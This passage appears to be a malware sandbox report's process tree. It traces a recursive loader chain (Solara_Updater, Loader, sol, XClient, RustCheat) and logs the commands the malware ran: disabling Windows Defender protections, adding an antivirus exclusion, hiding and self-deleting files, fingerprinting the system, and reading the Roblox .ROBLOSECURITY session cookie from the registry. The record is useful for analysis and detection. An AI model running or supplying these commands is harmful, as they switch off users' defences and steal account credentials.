        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        11⤵
        Executes dropped EXE
        
        PID:2224
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        8⤵
        
        PID:3272
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        9⤵
        Executes dropped EXE
        
        PID:868
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        9⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:3008
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        10⤵
        Checks computer location settings
        
        PID:2232
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        11⤵
        
        PID:5220
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        12⤵
        Executes dropped EXE
        
        PID:5420
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        9⤵
        
        PID:2452
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        10⤵
        Executes dropped EXE
        
        PID:1064
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        10⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:4568
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        11⤵
        Checks computer location settings
        
        PID:4268
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        12⤵
        
        PID:5532
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        13⤵
        Executes dropped EXE
        
        PID:2856
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        10⤵
        Checks computer location settings
        
        PID:2148
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        11⤵
        Executes dropped EXE
        
        PID:3752
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        11⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:2388
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        12⤵
        
        PID:2468
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        13⤵
        
        PID:5648
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        14⤵
        Executes dropped EXE
        
        PID:4004
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        11⤵
        
        PID:2052
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        12⤵
        Executes dropped EXE
        
        PID:1472
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        12⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:3096
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        13⤵
        
        PID:4440
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        14⤵
        
        PID:828
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        15⤵
        Executes dropped EXE
        
        PID:2280
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        12⤵
        Checks computer location settings
        
        PID:4024
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        13⤵
        Executes dropped EXE
        
        PID:4760
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        13⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:1260
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        14⤵
        
        PID:984
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        15⤵
        
        PID:2772
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        16⤵
        
        PID:5320
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        13⤵
        
        PID:4340
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        14⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5752
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        15⤵
        Executes dropped EXE
        
        PID:4408
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        15⤵
        Executes dropped EXE
        
        PID:3504
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        14⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:5812
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        15⤵
        
        PID:6004
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        16⤵
        
        PID:3248
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        17⤵
        
        PID:1660
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        14⤵
        Checks computer location settings
        
        PID:5828
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        15⤵
        Executes dropped EXE
        
        PID:5204
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        15⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:6136
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        16⤵
        
        PID:5388
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        17⤵
        
        PID:3008
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        18⤵
        
        PID:4420
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        15⤵
        Checks computer location settings
        
        PID:6132
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        16⤵
        Executes dropped EXE
        
        PID:5704
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        16⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:4396
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        17⤵
        
        PID:904
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        18⤵
        
        PID:5232
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        19⤵
        
        PID:5740
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        16⤵
        Checks computer location settings
        
        PID:6092
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        17⤵
        Executes dropped EXE
        
        PID:3408
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        17⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:2280
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        18⤵
        Checks computer location settings
        
        PID:3712
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        19⤵
        
        PID:5460
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        20⤵
        
        PID:1672
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        17⤵
        
        PID:2856
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        18⤵
        Executes dropped EXE
        
        PID:3496
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        18⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:5168
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        19⤵
        
        PID:4136
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        20⤵
        
        PID:5560
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        21⤵
        
        PID:4748
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        18⤵
        
        PID:2488
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        19⤵
        Executes dropped EXE
        
        PID:6072
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        19⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:5104
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        20⤵
        Checks computer location settings
        
        PID:3588
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        21⤵
        
        PID:5224
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        22⤵
        
        PID:824
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        19⤵
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        20⤵
        Executes dropped EXE
        
        PID:5960
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        20⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:2632
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        21⤵
        
        PID:5620
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        22⤵
        
        PID:6016
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        23⤵
        
        PID:2548
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        20⤵
        Checks computer location settings
        
        PID:5372
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        21⤵
        Executes dropped EXE
        
        PID:2568
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        21⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:980
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        22⤵
        Checks computer location settings
        
        PID:5024
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        23⤵
        
        PID:5400
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        24⤵
        
        PID:5300
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        21⤵
        
        PID:4692
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        22⤵
        Executes dropped EXE
        
        PID:1480
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        22⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:3496
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        23⤵
        
        PID:4760
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        24⤵
        
        PID:2644
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        25⤵
        
        PID:5624
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        22⤵
        
        PID:5792
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        23⤵
        Executes dropped EXE
        
        PID:3728
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        24⤵
        
        PID:5124
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        24⤵
        Drops file in Drivers directory
        
        PID:732
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        25⤵
        
        PID:4640
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        25⤵
        Views/modifies file attributes
        
        PID:5200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        25⤵
        
        PID:5536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        25⤵
        
        PID:5472
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        25⤵
        
        PID:2592
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        25⤵
        
        PID:4268
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        25⤵
        
        PID:2844
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        25⤵
        
        PID:6136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        25⤵
        
        PID:2052
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        25⤵
        Detects videocard installed
        
        PID:3416
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
        25⤵
        
        PID:3804
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        26⤵
        Runs ping.exe
        
        PID:820
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        23⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:5604
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        24⤵
        
        PID:5352
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        25⤵
        
        PID:6120
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        26⤵
        
        PID:5536
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        23⤵
        
        PID:1072
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        24⤵
        
        PID:1772
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        24⤵
        Modifies registry class
        
        PID:5564
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        25⤵
        
        PID:5604
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        26⤵
        
        PID:6084
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        27⤵
        
        PID:5392
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        24⤵
        
        PID:5448
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        25⤵
        
        PID:5772
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        25⤵
        Modifies registry class
        
        PID:2412
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        26⤵
        
        PID:5220
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        27⤵
        
        PID:5560
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        28⤵
        
        PID:5544
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        25⤵
        Checks computer location settings
        
        PID:5976
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        26⤵
        
        PID:5988
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        27⤵
        
        PID:3728
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        27⤵
        
        PID:2632
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        26⤵
        Checks computer location settings
        Modifies registry class
        
        PID:4024
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        27⤵
        
        PID:4904
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        28⤵
        
        PID:5876
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        29⤵
        
        PID:5412
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        26⤵
        Checks computer location settings
        
        PID:5140
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        27⤵
        Blocklisted process makes network request
        
        PID:5916
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        28⤵
        
        PID:5720
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        28⤵
        
        PID:5804
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        27⤵
        Modifies registry class
        
        PID:2848
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        28⤵
        
        PID:4440
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        29⤵
        
        PID:2632
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        30⤵
        
        PID:5432
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        27⤵
        
        PID:4260
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        28⤵
        
        PID:3272
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        29⤵
        
        PID:3680
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        29⤵
        Drops file in Drivers directory
        
        PID:2924
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        30⤵
        
        PID:1680
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        30⤵
        Views/modifies file attributes
        
        PID:1648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3540
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        30⤵
        
        PID:5732
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        30⤵
        
        PID:436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        30⤵
        
        PID:3312
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        30⤵
        
        PID:5328
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        30⤵
        
        PID:5664
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        30⤵
        
        PID:5988
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        30⤵
        
        PID:5916
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        30⤵
        Detects videocard installed
        
        PID:2428
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
        30⤵
        
        PID:3588
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        31⤵
        Runs ping.exe
        
        PID:4040
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        28⤵
        Checks computer location settings
        Modifies registry class
        
        PID:2308
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        29⤵
        Checks computer location settings
        
        PID:2856
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        30⤵
        
        PID:5308
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        31⤵
        
        PID:5836
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        28⤵
        Checks computer location settings
        
        PID:2004
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        29⤵
        Checks computer location settings
        
        PID:1668
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        30⤵
        
        PID:6004
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        30⤵
        
        PID:5848
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        29⤵
        Modifies registry class
        
        PID:5384
        
        C:\Windows\SysWOW64\WScript.exe
        
